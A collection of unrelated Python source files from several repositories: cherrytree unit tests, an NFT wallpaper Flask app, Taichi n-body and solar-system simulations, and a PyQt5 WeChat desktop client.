import unittest
from python_cherrytree import python_cherrytree
class TestPython_cherrytree(unittest.TestCase):
"""Tests for `python_cherrytree` package."""
def setUp(self):
"""Set up test fixtures, if any."""
self.manager = python_cherrytree.SqlManager("./tests/CTF_template.ctb")
def tearDown(self):
"""Tear down test fixtures, if any."""
def test_show_nodes(self):
"""Test show_nodes."""
self.manager.show_nodes()
def test_change_node_name(self):
"""Test change_node_name"""
self.manager.change_node_name("Test", 22)
def test_add_txt(self):
"""Test add_txt"""
self.manager.add_txt("Text", 24)
``` |
{
"source": "0xzche/0xplanet",
"score": 2
} |
#### File: libnft/url/asset.py
```python
from ..utils import log
import pathlib
from .request import get_with_retry
slug_info = {
"azuki": {
"opensean_url": "https://opensea.io/assets/0xed5af388653567af2f388e6224dc7c4b3241c544/{idx}",
"token_uri": "https://<KEY>
},
"0xzuki": {
"token_uri": "https://metadata.0xzuki.com/{idx}",
"opensea_url": "https://opensea.io/assets/0x2eb6be120ef111553f768fcd509b6368e82d1661/",
},
"felinefiendznft": {
"token_uri": "https://fiendz.io/metadata/{idx}.json",
"img_url_file": "meta/img_url//felinefiendznft.csv",
},
"loser-club-official": {
"token_uri": "https://api.loserclub.io/ipfs/QmVKHeqzbTVKzp88prnXwz3MdDMyMMEDjpGzL5aARriUbD/{idx}.json"
},
}
class Asset:
def __init__(self, *, slug, idx):
self._slug = slug
self._idx = idx
self._token_uri = self.get_token_uri()
self._token_uri_json = self.get_token_uri_json()
log.info(f"Initialized: collection {slug} number {idx}")
@property
def is_supported(self):
return self._slug in slug_info
def get_token_uri(self):
if not self.is_supported:
raise NotImplementedError(f"{self._slug} is not supported right now. Supported collections: {list(slug_info.keys())}")
base_uri = slug_info[self._slug]["token_uri"]
return base_uri.format(idx = self._idx)
def get_token_uri_json(self):
resp = get_with_retry(self._token_uri)
asset_info = json.loads(resp.text)
return asset_info
@property
def img_url(self):
img_url = self._token_uri_json["image"]
log.info(f"image: {img_url}")
if slug_info[self._slug].get("img_url_file", None): # first check if we have downloaded the img_url to file
img_url_file = slug_info[self._slug].get("img_url_file", None)
log.info(f"reading img_url from file {img_url_file}")
img_url_df = pd.read_csv(f"{current_app.root_path}/static/{img_url_file}").rename(
columns={"num": "idx"}).set_index("idx")
img_url = img_url_df.loc[int(self._idx)]["img_url"]
log.info(f"img_url from file: {img_url}")
elif img_url.startswith("ipfs"): # this does not work
hash_ = img_url.split("/")[-1]
log.info(f"extracted hash {hash_}")
if not hash_ or not hash_.startswith('Qm'):
raise ValueError(f"invalid hash {hash_}")
img_url = "http://127.0.0.1:8080/ipfs/" + hash_
log.info(f"url from ipfs hash: {img_url}")
return img_url
def get_img(self, out_file=None):
resp = get_with_retry(self.img_url)
if out_file is not None:
pathlib.Path(out_file).parent.mkdir(parents=True, exist_ok=True)
log.info(f"downloading {self.img_url} to {out_file}")
log.info(f"writing image to {out_file}")
with open(str(out_file), "wb") as f:
f.write(resp.content)
self._img = resp.content
return self._img
```
#### File: 0xzche/0xplanet/main.py
```python
from flask import Flask, render_template, request, send_file, current_app, url_for, redirect
import numpy as np
from PIL import Image, ImageFilter, ImageDraw, ImageFont
from io import BytesIO
import sys, os
sys.path.insert(0, "../..")
from libnft.url.asset import Asset
from libnft.utils import *
from apps import wallpaper
from apps.kiri_likes import kiri_likes
from base64 import b64encode
#from libnft.test import data_path
#CLOUD_STORAGE_BUCKET = os.environ['CLOUD_STORAGE_BUCKET']
app = Flask(__name__)
cache = {
}
name_to_slug = {
"Azuki": "azuki",
"0xZuki": "0xzuki",
"<NAME>": "felinefiendznft",
"Loser Club": "loser-club-official"
}
@app.route("/wallpaper", methods=["POST", "GET"])
def wallpaper_index():
if request.method == 'POST':
log.info(f"{request.form}")
slug = name_to_slug.get(request.form["slug_name"])
idx = request.form["idx"]
if not idx:
return render_template("wallpaper_index.html", warning="Please input a valid number (0~9999) !!")
size = request.form["size"]
h, w = size.split("(")[0].split(":")
ratio = f"{h}by{w}"
max_idx = wallpaper.get_info(slug)["idx_range"][-1]
idx = str(min(max_idx, int(idx)))
log.info(f"{slug}, {idx}, {ratio}")
return redirect(url_for(f'wallpaper_out', slug=slug, idx=idx, ratio=ratio))
return render_template("wallpaper_index.html")
@app.route("/wallpaper/<slug>/<idx>/<ratio>/img")
def wallpaper_img(slug, idx, ratio):
h, w = ratio.split("by")
ratio = float(h) / float(w)
cache_key = (slug, idx, ratio)
log.info(f"cached items: {cache.keys()}, cache id: {id(cache)}")
if cache_key in cache:
log.info(f"retreiving image {cache_key} from cache....")
new_img = cache[(slug, idx, ratio)]
else:
log.info(f"image {cache_key} not found in cache, creating new ....")
if len(cache) > 50:
log.info(f"cache too large btw, clearing...")
cache.clear()
asset = Asset(slug=slug, idx=idx)
collection_info = wallpaper.get_info(slug)
old_img_bytes = asset.get_img()
old_img = Image.open(BytesIO(old_img_bytes))
if old_img.size[0] > 1000:
old_img = old_img.resize((1000, 1000))
log.info(f"processing image")
old_w, old_h = old_img.size
new_w = old_w
new_h = int(new_w * ratio)
bg_color = old_img.getpixel((10, 10))
new_img = Image.new("RGBA", size=(new_w, new_h), color=bg_color)
n_slices = collection_info.get("n_slices")
if n_slices:
top_slice = old_img.crop((0, 0, old_w, old_h // n_slices))
for i in range(int(n_slices * 1.3)):
new_img.paste(top_slice, (0, i * old_h // n_slices))
paste_anchor = (0, new_h - old_h)
new_img.paste(old_img, paste_anchor)
# write txt
log.info(f"done processing image")
font_name = collection_info["font"]
font_path = Path(current_app.root_path) / "static" / "fonts" / f"{font_name}.ttf"
font = ImageFont.truetype(str(font_path), int(new_h * collection_info["font_size"]) )
txt = Image.new('RGBA', new_img.size, (255,255,255,0))
drawer = ImageDraw.Draw(new_img)
drawer.text((new_w // 2, int((new_h - old_h) * 0.85) ),
collection_info["title"],
fill=(0, 0, 0, 255), font=font, anchor="mm")
new_img = Image.alpha_composite(new_img, txt)
log.info(f"saving {cache_key} to cache")
cache[(slug, idx, ratio)] = new_img
log.info(f"cached items: {cache.keys()}, cache id: {id(cache)}")
# ...
image_io = BytesIO()
new_img.save(image_io, format='PNG')
image_io.seek(0)
return send_file(
image_io,
as_attachment=False,
mimetype='image/png'
)
@app.route("/wallpaper/<slug>/<idx>/<ratio>")
def wallpaper_out(slug, idx, ratio):
new_img_url = url_for("wallpaper_img", slug=slug, idx=idx, ratio=ratio)
return render_template("wallpaper_out.html",
new_img_url=new_img_url,
bg_color="rgb(0,0,0)")
@app.route("/kiri/likes")
def kiri_likes_page():
log_ = kiri_likes()
rendered = "".join(
[
f"<p> {_} </p>"
for _ in log_.content
]
)
return rendered
if __name__ == '__main__':
app.run(host="127.0.0.1", port=8080, debug=True)
``` |
{
"source": "0xzhang/Barnes-Hut-Simulation",
"score": 3
} |
#### File: 0xzhang/Barnes-Hut-Simulation/nbody_naive.py
```python
import math
import taichi as ti
import numpy as np
from body import Body
ti.init(arch=ti.cpu)
# number of planets
N = 100
# galaxy size
galaxy_size = 0.2
# time-step size
h = 1e-4
# substepping
substepping = 1
dt = h / substepping
# center of the screen
center = ti.Vector.field(2, ti.f32, ())
center[None] = [0.5, 0.5]
# pos, vel and force of the planets
pos = ti.Vector.field(2, ti.f32, N)
vel = ti.Vector.field(2, ti.f32, N)
bodies = []
# init pos and vel
@ti.kernel
def ti_init():
# init vel
init_vel = 120
for i in range(N):
theta = ti.random() * 2 * math.pi
r = (ti.sqrt(ti.random()) * 0.6 + 0.4) * galaxy_size
offset = r * ti.Vector([ti.cos(theta), ti.sin(theta)])
pos[i] = center[None] + offset
vel[i] = [-offset.y, offset.x]
vel[i] *= init_vel
# init bodies list
def init():
ti_init()
p = pos.to_numpy()
v = vel.to_numpy()
for i in range(N):
bodies.append(Body(1, p[i], v[i]))
def step():
for i in range(substepping):
# n^2
# for body in bodies:
# body.reset_force()
# for other in bodies:
# body.add_force(other)
# body.update(dt)
# 1/2 n^2
# Actions equals minus reactions, according to Newton's Third Law.
for bi in range(len(bodies)):
bodies[bi].reset_force()
for bj in range(bi, len(bodies)):
df = bodies[bi].ret_force(bodies[bj])
bodies[bi].update_force(df)
bodies[bj].update_force(-df)
bodies[bi].update(dt)
def display(gui):
for body in bodies:
body.display(gui)
gui.show()
def main():
ui = True
init()
if ui:
gui = ti.GUI('N-body naive simulation', (800, 800))
pause = False
while gui.running:
for e in gui.get_events(ti.GUI.PRESS):
if e.key in [ti.GUI.ESCAPE, ti.GUI.EXIT]:
exit()
elif e.key == 'r':
init()
elif e.key == ti.GUI.SPACE:
pause = not pause
if not pause:
step()
display(gui)
else:
while True:
step()
if __name__ == "__main__":
main()
``` |
{
"source": "0xzhang/taichi-play",
"score": 3
} |
#### File: taichi-play/solar_system/solar_system.py
```python
import taichi as ti
from datetime import datetime, timedelta
# Length of Year
# Tricky: I use many small spheres(call `scene.particles()``)
# to represent the orbit of planets.
# If dt is too small, 8000 may not enough, the orbit will be an arc.
LOY = 8000
@ti.data_oriented
class CelestialObject:
def __init__(self, radius, dim=3):
self.radius = radius
self.dim = dim
self.color = ti.Vector.field(dim, ti.f32, shape=1)
self.pos = ti.Vector.field(dim, ti.f32, shape=1)
def display(self, scene):
scene.particles(self.pos, self.radius, per_vertex_color=self.color)
@ti.data_oriented
class Sun(CelestialObject):
@ti.kernel
def initialize(self, color: ti.template()):
self.color[0] = color
self.pos[0].fill(0.0)
@ti.data_oriented
class Planet(CelestialObject):
def __init__(self, radius, dim=3):
super().__init__(radius)
self.vel = ti.Vector.field(dim, ti.f32, shape=1)
self.orbit = ti.Vector.field(dim, ti.f32, shape=LOY)
self.orbit_colors = ti.Vector.field(dim, ti.f32, shape=LOY)
self.orbit_radius = self.radius / 8
@ti.kernel
def initialize(self, color: ti.template(), pos: ti.template(),
vel: ti.template()):
self.color[0] = color
self.pos[0] = pos
self.vel[0] = vel
self.orbit[0] = pos
for i in range(LOY):
self.orbit_colors[i] = color
@ti.kernel
def update(self, dt: ti.f32, step: ti.i32):
self.pos[0] += self.vel[0] * dt
sqr_sum = self.pos[0].norm_sqr()
# in units of AU/day^2
acc = -2.959e-4 * self.pos[0] / sqr_sum**(3. / 2)
self.vel[0] += acc * dt
self.orbit[step % LOY] = self.pos[0]
def ghost(self, scene):
scene.particles(self.orbit,
self.orbit_radius,
per_vertex_color=self.orbit_colors)
@ti.data_oriented
class SolarSystem:
def __init__(self, sun):
self.sun = sun
self.planets = []
self.date = None
self.step = 0
self.time = 0.0
def add_planet(self, planet):
self.planets.append(planet)
def update(self, dt=1):
self.step = (self.step + 1) % LOY
self.time += dt
for i, p in enumerate(self.planets):
p.update(dt, self.step)
def display(self, scene):
self.sun.display(scene)
for p in self.planets:
p.display(scene)
p.ghost(scene)
def get_date(self):
date = self.date + timedelta(int(self.time))
return date.isoformat()
``` |
{
"source": "0xzhaohx/wechat-qt5",
"score": 2
} |
#### File: core/messages/messagemanager.py
```python
class MessageManager(object):
def __init__(self):
pass
def save_message(self, message):
pass
def fetch_messages(self,user_name):
pass
```
#### File: wechat/tool/wechathelper.py
```python
class WechatHelper(object):
'''
classdocs
'''
def __init__(self, params):
'''
Constructor
'''
def isPicture(self,path):
if not path:
return False
if path.endswith("jpg") or path.endswith("jpeg") or path.endswith("png"):
return True
```
#### File: wechat/ui/about.py
```python
from PyQt5.Qt import Qt
from PyQt5.QtWidgets import QVBoxLayout,QDialog,QLabel
from PyQt5.QtCore import QSize
def __unicode(self,s):
return s;
class About(QDialog):
WIDTH = 460
HEIGHT = 300
def __init__(self,parent=None):
super(About,self).__init__(parent)
#super(About,self).setWindowFlags(QtCore.Qt.Popup)
self.setModal(True)
self.resize(QSize(About.WIDTH,About.HEIGHT))
self.setWindowTitle(__unicode("關於"))
self.about_initial()
def about_initial(self):
#
mainLayout=QVBoxLayout()
label = QLabel("v0.6")
label.setAlignment(Qt.AlignHCenter)
mainLayout.addWidget(label)
#mainLayout.addWidget(self.emotion_table)
self.setLayout(mainLayout)
```
#### File: ox11/wechat/wechatwin.py
```python
__date__='2018年3月25日'
'''
import sip
sip.setapi('QString', 1)
sip.setapi('QVariant', 1)
'''
import sys
import os
import threading
import re
from time import sleep
import time
from com.ox11.wechat import property
from msg import Msg
from com.ox11.wechat.ui.emotion import Emotion
from com.ox11.wechat.ui.MemberListWidget import MemberListWidget
from com.ox11.wechat.ui.about import About
from com.ox11.wechat.ui.delegate.labeldelegate import LabelDelegate
from config import WechatConfig
import wechatutil
import xml.dom.minidom
import json
import logging
from PyQt5.QtGui import QIcon, QCursor, QTextImageFormat,QStandardItemModel
from PyQt5.QtWidgets import QLabel,QDialog,QFileDialog,QMenu,QVBoxLayout,QAction,QMainWindow
from PyQt5 import QtGui, uic
from PyQt5.QtCore import QSize, pyqtSlot, pyqtSignal, QPoint
'''
reload(sys)
sys.setdefaultencoding('utf-8')
'''
qtCreatorFile = "resource/ui/wechatwin-0.5.ui"
WeChatWindow, QtBaseClass = uic.loadUiType(qtCreatorFile)
class WeChatWin(QMainWindow, WeChatWindow):
I18N = "resource/i18n/resource.properties"
EMOTION_DIR = "./resource/expression"
MESSAGE_TEMPLATE = "./resource/messages.html"
LOG_FORMAT = '%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s'
'''
webwx_init
->webwxstatusnotify()
->(webwx_geticon|webwx_batch_getheadimg)
->webwx_getcontact
->first call webwx_batch_getcontact
->(webwx_geticon|webwx_batch_getheadimg)
->second call webwx_batch_getcontact
'''
initialed = pyqtSignal()
messageReceived = pyqtSignal(str)
def __init__(self,wechatweb,qApp):
QMainWindow.__init__(self)
WeChatWindow.__init__(self)
self.setAcceptDrops(True)
self.config = WechatConfig()
logging.basicConfig(filename='%s/wechat.log'%self.config.getAppHome(),level=logging.DEBUG,format=WeChatWin.LOG_FORMAT)
self.default_head_icon = './resource/images/default.png'
self.current_chat_contact = None
self.messages_pool = {}
#没有來得及處理的新消息,主要用於存放UI未初始化完時收到消息,然後等初始結束處理
self.blocked_messages_pool = []
self.prepare4Environment()
self.wechatweb = wechatweb
self.qApp=qApp
self.setupUi(self)
self.setWindowIcon(QIcon("resource/icons/hicolor/32x32/apps/wechat.png"))
self.chatsModel = QStandardItemModel(0,4)
self.friendsModel = QStandardItemModel(0,3)
self.publicModel = QStandardItemModel()
#connect the slot before #wxinitial()
self.messageReceived.connect(self.webwx_sync_process)
#initial messages
#should initial before chat item click
ap = os.path.abspath(WeChatWin.MESSAGE_TEMPLATE)
#self.messages.load(QUrl.fromLocalFile(ap))
#self.messages.loadFinished.connect(self.loadFinished)
#after initial model,do login
self.wechatweb.login()
self.wxinitial()
#self.synct = WeChatSync(self.wechatweb)
#self.synct.start()
timer = threading.Timer(5, self.synccheck)
timer.setDaemon(True)
timer.start()
self.memberListWidget = None
self.showImageDialog = None
self.friendsWidget.setVisible(False)
self.publicWidget.setVisible(False)
self.profileWidget.setVisible(False)
self.init_chat_contacts()
self.init_friends()
self.init_public()
self.emotionscodeinitial()
self.initialed.connect(self.process_blocked_messages)
self.chatAreaWidget.setVisible(False)
self.chatsWidget.setItemDelegate(LabelDelegate())
self.chatsWidget.setIconSize(QSize(45,45))
self.chatsWidget.setModel(self.chatsModel)
self.chatsWidget.selectionModel().selectionChanged.connect(self.chat_item_clicked)
self.chatsWidget.setColumnHidden(0,True)
self.chatsWidget.setColumnHidden(3,True)
self.chatsWidget.setColumnWidth(1, 70);
self.chatsWidget.setColumnWidth(3, 30);
#self.chatsWidget.horizontalHeader().setStretchLastSection(True)
self.friendsWidget.setModel(self.friendsModel)
self.friendsWidget.setIconSize(QSize(45,45))
##self.friendsWidget.selectionModel().selectionChanged.connect(self.member_item_clicked)
self.friendsWidget.setColumnHidden(0,True)
self.friendsWidget.setColumnWidth(1, 70);
self.friendsWidget.setColumnWidth(3, 30);
self.publicWidget.setModel(self.publicModel)
self.chatButton.clicked.connect(self.switch_chat)
self.friendButton.clicked.connect(self.switch_friend)
self.sendButton.clicked.connect(self.send_msg)
self.pushButton.clicked.connect(self.to_chat)
self.emotionButton.clicked.connect(self.select_emotion)
self.selectImageFileButton.clicked.connect(self.select_document)
self.currentChatUser.clicked.connect(self.current_chat_user_click)
self.showMemberButton.clicked.connect(self.showMembers)
self.addMenu4SendButton()
self.addMenu4SettingButton()
#
self.initialed.emit()
@pyqtSlot()
def loadFinished(self):
print('loadFinished')
self.messages.page().mainFrame().addToJavaScriptWindowObject("Wechat", self)
@pyqtSlot(str)
def showImage(self,image):
if self.showImageDialog:
print(image)
self.showImageDialog.show()
else:
self.showImageDialog = QDialog(self)
#self.showImageDialog.setModal(True)
mainLayout = QVBoxLayout()
image_label = QLabel()
s_image = QtGui.QImage()
user_icon = self.config.get + self.wechatweb.getUser()['UserName'] + ".jpg"
if s_image.load(user_icon):
image_label.setPixmap(QtGui.QPixmap.fromImage(s_image))
mainLayout.addWidget(image_label)
self.showImageDialog.setLayout(mainLayout)
self.showImageDialog.show()
@pyqtSlot(str)
def getSelectedUsers(self,users):
'''
#建群
'''
if not users:
return
#dictt = json.loads(str(users))
user_list = str(users).split(";")
member_list = []
for s_user in user_list:
if len(s_user) > 1:
user = {}
user['UserName']=s_user
member_list.append(user)
user = {}
user['UserName']=self.current_chat_contact["UserName"]
member_list.append(user)
response_data = self.wechatweb.webwx_create_chatroom(member_list)
print("webwx_create_chatroom response:%s"%response_data)
data_dict = json.loads(response_data)
if data_dict["BaseResponse"]["Ret"] == 0:
chat_room_name = data_dict["ChatRoomName"]
data = {
'Count': 1,
'List': [{"UserName":chat_room_name,"ChatRoomId":""}]
}
batch_response = self.wechatweb.webwx_batch_get_contact(data)
if batch_response['Count'] and batch_response['Count'] > 0:
new_contact = batch_response['ContactList'][0]
remark_name = ("%s,%s,%s")%(self.wechatweb.getUser()["NickName"],self.current_chat_contact["NickName"],"")
new_contact["RemarkName"]=remark_name
self.wechatweb.appendFriend(new_contact)
self.wechatweb.webwx_get_head_img(new_contact["UserName"], new_contact["HeadImgUrl"])
self.append_contact_row(new_contact,self.chatsModel,action="INSERT",row=0)
@pyqtSlot(str)
def get_select_emotion(self,emotion):
cursor = self.draft.textCursor()
imageFormat =QTextImageFormat();
imageFormat.setName(os.path.join(Emotion.EMOTION_DIR,str(emotion)));
cursor.insertImage(imageFormat)
'''
self.draft.moveCursor(QTextCursor.End)
self.draft.append("<img src=%s>"%(os.path.join(Emotion.EMOTION_DIR,str(emotion))))
'''
@pyqtSlot(str)
def webwx_sync_process(self, data):
'''
@param data
MSTTYPE:
MSGTYPE_TEXT: 1,文本消息
MSGTYPE_IMAGE: 3,图片消息
MSGTYPE_VOICE: 34,语音消息
37,好友确认消息
MSGTYPE_VIDEO: 43,
MSGTYPE_MICROVIDEO: 62,
MSGTYPE_EMOTICON: 47,
MSGTYPE_APP: 49,
MSGTYPE_VOIPMSG: 50,
51,微信初始化消息
MSGTYPE_VOIPNOTIFY: 52,
MSGTYPE_VOIPINVITE: 53,
MSGTYPE_LOCATION: 48,
MSGTYPE_STATUSNOTIFY: 51,
MSGTYPE_SYSNOTICE: 9999,
MSGTYPE_POSSIBLEFRIEND_MSG: 40,
MSGTYPE_VERIFYMSG: 37,
MSGTYPE_SHARECARD: 42,
MSGTYPE_SYS: 10000,
MSGTYPE_RECALLED: 10002, // 撤销消息
'''
if not data:
return False
data = json.loads(str(data), object_hook=wechatutil.decode_data)
ret_code = data['BaseResponse']['Ret']
if ret_code == 0:
pass
else:
return False
add_msg_count = data['AddMsgCount']
if add_msg_count == 0:
return True
messages = data['AddMsgList']
for message in messages:
self.msg_handle(message)
def process_blocked_messages(self):
logging.debug('start process blocked_messages_pool')
for message in self.blocked_messages_pool:
self.msg_handle(message)
def wxinitial(self):
wx_init_response = self.wechatweb.webwx_init()
#self.wechatweb.webwxstatusnotify()
self.setupwxuser()
#do downlaod icon
self.wechatweb.webwx_get_contact()
self.synccheck(loop=False)
#TODO download the head image or icon of contact
#fetch the icon or head image that init api response
groups = []
for contact in wx_init_response['ContactList']:
user_name = contact['UserName']
head_img_url = contact['HeadImgUrl']
if not user_name or not head_img_url:
continue
if self.isChatRoom(user_name):
#prepare arguments for batch_get_contact
group = {}
group['UserName'] = contact['UserName']
group['ChatRoomId'] = ''
groups.append(group)
#doanload head image
##self.wechatweb.webwx_get_head_img(user_name,head_img_url)
elif user_name.startswith('@'):
##self.wechatweb.webwx_get_icon(user_name,head_img_url)
pass
else:
pass
params = {
'Count': len(groups),
'List': groups
}
self.batch_get_contact(data=params)
def addMenu4SendButton(self):
menu = QMenu()
enterAction = QAction(wechatutil.unicode("按Enter發送消息"),self)
menu.addAction(enterAction)
self.sendSetButton.setMenu(menu)
def addMenu4SettingButton(self):
menu = QMenu()
createChatRoorAction = QAction(wechatutil.unicode("開始聊天"),self)
menu.addAction(createChatRoorAction)
notifySwitchAction = QAction(wechatutil.unicode("關閉通知"),self)
menu.addAction(notifySwitchAction)
soundSwitchAction = QAction(wechatutil.unicode("關閉聲音"),self)
menu.addAction(soundSwitchAction)
logoutAction = QAction(wechatutil.unicode("退出"),self)
menu.addAction(logoutAction)
aboutAction = QAction(wechatutil.unicode("關於"),self)
menu.addAction(aboutAction)
self.settingButton.setMenu(menu)
aboutAction.triggered.connect(self.showAbout)
logoutAction.triggered.connect(self.do_logout)
def showAbout(self):
about = About(self)
about.show()
def emotionscodeinitial(self):
self.emotionscode = property.parse(WeChatWin.I18N).properties or {}
def relogin(self):
print("relogin..............")
self.qApp.exit(888)
def do_logout(self):
self.relogin()
'''
print("logout..............")
sys.exit(0)
'''
def batch_get_contact(self,data=None):
params = data
response = self.wechatweb.webwx_batch_get_contact(params)
'''
session_response中的contact里面有群成员,所以更新chat_contact
if response['Count'] and response['Count'] > 0:
session_list = response['ContactList']
for x in session_list:
for i,ss in enumerate(self.wechatweb.getChatContacts()):
if ss["UserName"] == x["UserName"]:
self.wechatweb.update_chat_contact(i,x)
break
'''
for contact in response['ContactList']:
user_name = contact['UserName']
head_img_url = contact['HeadImgUrl']
if not user_name or not head_img_url:
continue
image = '%s\heads\contact\%s.jpg'%(self.config.getAppHome(),user_name)
#下載聯天室圖像
if not os.path.exists(image):
self.wechatweb.webwx_get_head_img(user_name,head_img_url)
else:
logging.warning("%s is already exist"%image)
#如果群没有名字,则取前2个成员名字的组合作为群名称
if not contact["NickName"] and not contact["DisplayName"]:
t_names = []
for _member in contact["MemberList"][:2]:
t_names.append(_member['DisplayName'] or _member['NickName'])
contact["DisplayName"] = "、".join(t_names)
#把聯天室加入聯系人列表對象
for member in self.wechatweb.getFriends():
exist = False
if contact["UserName"] == member["UserName"]:
exist = True
if not member["NickName"] and not member["DisplayName"] and t_names:
member["DisplayName"]= "、".join(t_names)
break
if exist is False:
self.wechatweb.appendFriend(contact)
#更新chat_contact,以使其群成员有数据
for i,chat_contact in enumerate(self.wechatweb.getChatContacts()):
if contact["UserName"] == chat_contact["UserName"]:
self.wechatweb.update_chat_contact(i,contact)
break
return response
def prepare4Environment(self):
if os.path.exists(self.config.customFace):
self.__remove()
else:
os.makedirs(self.config.customFace)
def __remove(self):
'''
#删除下载的头像文件
'''
for i in os.listdir(self.config.customFace):
head_icon = os.path.join(self.config.customFace,i)
if os.path.isfile(head_icon):
os.remove(head_icon)
def dragEnterEvent(self, event):
if event.mimeData().hasUrls():
event.acceptProposedAction()
print("dragEnterEvent")
def dragMoveEvent(self, event):
print("dragMoveEvent")
def isImage(self,path):
if not path:
return False
if path.endswith("jpg") or path.endswith("jpeg") or path.endswith("png"):
return True
def dropEvent(self, event):
#print("dropEvent")
if event.mimeData().hasUrls():
#遍历输出拖动进来的所有文件路径
for url in event.mimeData().urls():
file_name = str(url.toLocalFile())
if self.isImage(file_name):
self.draft.append("<img src=%s width=80 height=80>"%(file_name))
event.acceptProposedAction()
else:
#super(Button,self).dropEvent(event)
pass
def load_image(self, img_path,use_default=True):
image = QtGui.QImage()
if image.load(img_path):
return image
else:
if use_default:
image.load(self.config.getAppHome())
def setupwxuser(self):
user = self.wechatweb.getUser()
nickName = user['NickName']
self.userNameLabel.setText(wechatutil.unicode(nickName))
user_icon = "%s\\%s.jpg"%(self.config.customFace,user['UserName'] )
user_head_image = QtGui.QImage()
if user_head_image.load(user_icon):
self.headImageLabel.setPixmap(QtGui.QPixmap.fromImage(user_head_image).scaled(40, 40))
else:
if user_head_image.load(self.config.getDefaultIcon()):
self.headImageLabel.setPixmap(QtGui.QPixmap.fromImage(user_head_image).scaled(40, 40))
def code_emotion(self,msg):
imagePattern=re.compile(r'src="([.*\S]*\.gif)"',re.I)
ppattern = re.compile(r'<p style=".*\S">(.+?)</p>', re.I)
pimages = []
ps = ppattern.findall(msg)
for p in ps:
pimage = {}
pimage["p"]=p
images = imagePattern.findall(p,re.I)
for image in images:
#print("emotion:%s"%image)
for key,emotioncode in self.emotionscode.items():
epath = os.path.join(WeChatWin.EMOTION_DIR,("%s.gif")%key)
imagemark = ('<img src="%s" />')%(epath)
if image ==epath:
#print('[%s]'%((code_emotion)))
pcode = p.replace(imagemark,'[%s]'%(wechatutil.unicode(emotioncode)))
#print("p coded:%s"%pcode)
pimage["p"]=pcode
break
pimage["images"]=images
pimages.append(pimage)
return pimages
def decode_emotion(self,msg):
pattern =re.compile(u"\[[\u4e00-\u9fa5]{1,3}\]")
result=re.findall(pattern,msg)
for emotion in result:
#print emotion
for key,val in self.emotionscode.items():
if emotion ==("[%s]")%(val):
epath = os.path.join(WeChatWin.EMOTION_DIR,("%s.gif")%key)
msg = msg.replace(emotion,("<img src=%s>")%(epath))
break
return msg
def append_chat_contact(self,chat_contact,action="APPEND",row=None):
'''
:param action APPEND OR INSERT,APPEND value is default
'''
###############
cells = []
# user name item
user_name = chat_contact['UserName']
user_name_cell = QtGui.QStandardItem(wechatutil.unicode(user_name))
cells.append(user_name_cell)
user_head_icon = "%s\\%s.jpg"%(self.config.customFace,user_name)
item = QtGui.QStandardItem(QIcon(user_head_icon),"")
cells.append(item)
dn = chat_contact['DisplayName'] or chat_contact['RemarkName'] or chat_contact['NickName']
#if not dn:
#dn = contact['NickName']
# user remark or nick name
remark_nick_name_item = QtGui.QStandardItem(wechatutil.unicode(dn))
cells.append(remark_nick_name_item)
#
tips_count_item = QtGui.QStandardItem()
cells.append(tips_count_item)
if "APPEND" == action:
self.chatsModel.appendRow(cells)
elif "INSERT" == action and row >= 0:
self.chatsModel.insertRow(row,cells)
else:
self.chatsModel.appendRow(cells)
def append_friend(self,contact,action="APPEND",row=None):
'''
:param action APPEND OR INSERT,APPEND value is default
'''
###############
cells = []
# user name item
user_name = contact['UserName']
user_name_item = QtGui.QStandardItem(wechatutil.unicode(user_name))
cells.append(user_name_item)
user_head_icon = "%s\\%s.jpg"%(self.config.customFace, user_name)
item = QtGui.QStandardItem(QIcon(user_head_icon),"")
cells.append(item)
_name = contact['DisplayName'] or contact['RemarkName'] or contact['NickName']
#if not dn:
#dn = contact['NickName']
# user remark or nick name
_name_item = QtGui.QStandardItem(wechatutil.unicode(_name))
cells.append(_name_item)
#
if "APPEND" == action:
self.friendsModel.appendRow(cells)
elif "INSERT" == action and row >= 0:
self.friendsModel.insertRow(row,cells)
else:
self.friendsModel.appendRow(cells)
def messages_clear(self):
#ap = os.path.abspath(WeChatWin.MESSAGE_TEMPLATE)
#self.messages.load(QUrl.fromLocalFile(ap))
#self.messages.page().mainFrame().evaluateJavaScript("clearr();")
self.messages.setText("")
pass
def init_chat_contacts(self):
'''
contact table (5 columns)
column 1:user name(will be hidden)
column 2:head icon
column 3:remark or nick name
column 4:message count tips(will be hidden)
:return:
'''
#self.chatsWidget.setColumnCount(4)
''''''
for chat_contact in self.wechatweb.getChatContacts():
self.append_chat_contact(chat_contact)
'''
for session in sorted([x for x in self.wechatweb.friend_list if x["AttrStatus"] and x["AttrStatus"] > 0],key=lambda ct: ct["AttrStatus"],reverse=True):
exist = False
for contact in self.wechatweb.chat_list:
if contact["UserName"] == session["UserName"]:
exist = True
if not exist:
self.append_contact_row(session,self.chatsModel)
'''
#self.chatsWidget.clicked.connect(self.chat_item_clicked)
def init_friends(self):
''''''
#self.friendsModel.setColumnHidden(0,True)
'''
/***/
/*去掉每行的行号*/
QHeaderView *headerView = table->verticalHeader();
headerView->setHidden(true);
'''
self.friendsWidget.setColumnHidden(1,True)
group_contact_list = []
for member in self.wechatweb.getFriends():
group_contact_list.append(member)
group_contact_list.sort(key=lambda mm: mm['RemarkPYInitial'] or mm['PYInitial'])
#group_contact_list.sort(key=lambda mm: mm['RemarkPYQuanPin'] or mm['PYQuanPin'])
for member in group_contact_list:#.sort(key=lambda m: m['PYInitial'])
self.append_friend(member)
self.friendsWidget.clicked.connect(self.member_item_clicked)
def init_public(self):
pass
#self.readerListWidget.addItem("readers")
#self.readerListWidget.clicked.connect(self.contact_cell_clicked)
def switch_chat(self,show=False):
current_row =self.chatsWidget.currentIndex().row()
if current_row > 0 or show:
self.chatAreaWidget.setVisible(True)
self.label.setVisible(False)
else:
self.chatAreaWidget.setVisible(False)
self.label.setVisible(True)
self.chatsWidget.setVisible(True)
self.friendsWidget.setVisible(False)
self.profileWidget.setVisible(False)
def public_button_clicked(self):
self.friendsWidget.setVisible(False)
self.chatsWidget.setVisible(False)
self.publicWidget.setVisible(True)
def switch_friend(self):
current_row =self.friendsWidget.currentIndex().row()
if current_row > 0:
self.label.setVisible(False)
self.profileWidget.setVisible(True)
else:
self.label.setVisible(True)
self.profileWidget.setVisible(False)
self.friendsWidget.setVisible(True)
self.chatsWidget.setVisible(False)
self.chatAreaWidget.setVisible(False)
def get_contact(self,user_name):
return self.get_member(user_name)
def get_member(self,user_name):
for member in self.wechatweb.getChatContacts():
if user_name == member['UserName']:
return member
for member in self.wechatweb.getFriends():
if user_name == member['UserName']:
return member
